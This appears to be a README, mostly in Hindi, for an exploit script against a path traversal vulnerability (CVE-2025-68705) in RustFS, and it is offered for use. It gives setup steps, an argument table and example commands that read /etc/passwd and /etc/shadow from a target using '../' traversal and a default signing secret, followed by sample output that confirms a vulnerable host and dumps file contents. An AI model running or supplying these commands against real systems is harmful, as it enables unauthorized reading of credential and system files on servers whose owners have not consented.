
CVE-2025-68705 RustFS Path Traversal Vulnerability Check
यह स्क्रिप्ट RustFS में एक पथ पारगमन भेद्यता (CVE-2025-68705) का शोषण करती है जो सर्वर पर मनमानी फ़ाइलों को पढ़ने की अनुमति देती है।
requirements.txt देखेंgit clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]
| तर्क | विवरण |
|---|---|
-H, --host | लक्ष्य होस्ट IP या होस्टनाम |
-p, --port | लक्ष्य पोर्ट संख्या |
-f, --file | पढ़ने के लिए फ़ाइल पथ (--check-only के साथ वैकल्पिक) |
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret
python exp.py -H 192.168.1.128 -p 9000 --check-only
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!
[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।
| तर्क | विवरण | डिफ़ॉल्ट |
|---|
-s, --secret | हस्ताक्षर के लिए गुप्त कुंजी | rustfsadmin |
-o, --offset | फ़ाइल पढ़ने का ऑफ़सेट | 0 |
-l, --length | पढ़ने के लिए बाइट्स की संख्या | 4096 |
--check-only | केवल यह जाँचें कि लक्ष्य असुरक्षित है या नहीं | - |